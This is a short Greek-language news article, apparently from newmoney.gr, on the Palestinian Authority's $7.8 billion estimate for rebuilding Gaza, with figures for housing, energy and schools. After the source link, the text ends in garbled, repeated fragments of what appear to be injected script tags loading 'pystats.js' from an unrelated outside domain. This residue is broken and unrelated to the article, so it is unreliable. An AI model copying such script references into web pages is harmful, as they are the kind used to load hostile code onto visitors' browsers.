Στα 7,8 δισ. δολάρια το κόστος ανοικοδόμησης της Γάζας

Στα 7,8 δισ. δολάρια υπολογίζει η Παλαιστινιακή Αρχή το κόστος της ανοικοδόμησης της Γάζας, στο πλαίσιο της προσπάθειας να γίνει μια όσο το δυνατόν πιο συνολική εκτίμηση των ζημιών που προκάλεσε ο πόλεμος των επτά εβδομάδων με το Ισραήλ, στο πλαίσιο του οποίου ισοπεδώθηκαν ολόκληρες γειτονιές και κρίσιμες υποδομές.

Το κόστος της ανοικοδόμησης 17.000 κατοικίες στη Γάζα υπολογίζεται στα 2,5 δισ. δολάρια, ενώ ο ενεργειακός κλάδος ζητά επενδύσεις 250 εκατ. δολαρίων, αφότου το μοναδικό εργοστάσιο παραγωγής ενέργειας καταστράφηκε από δύο ισραηλινούς πυραύλους. Για την εκπαίδευση θα απαιτηθούν 143 εκατ. δολάρια, καθώς περίπου μισό εκατομμύριο παιδιά αδυνατούν να επιστρέψουν στα σχολεία τους, τα οποία είτε έχουν καταστραφεί ή χρησιμοποιούνται για να στεγαστούν οι πρόσφυγες.

Η ανοικοδόμηση της Γάζας θα χρηματοδοτηθεί σε μεγάλο βαθμό από την ξένη βοήθεια και θα είναι δυνατή μόνο εφόσον οι Ισραηλινοί ανοίξουν τα σύνορα.

Πηγή: Στα 7,8 δισ. δολάρια το κόστος ανοικοδόμησης της Γάζας | newmoney.gr http://www.newmoney.gr/article/64386/sta-78-dis-dolaria-kostos-anoikodomisis-tis-gazas#ixzz3CNJXVrTK challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >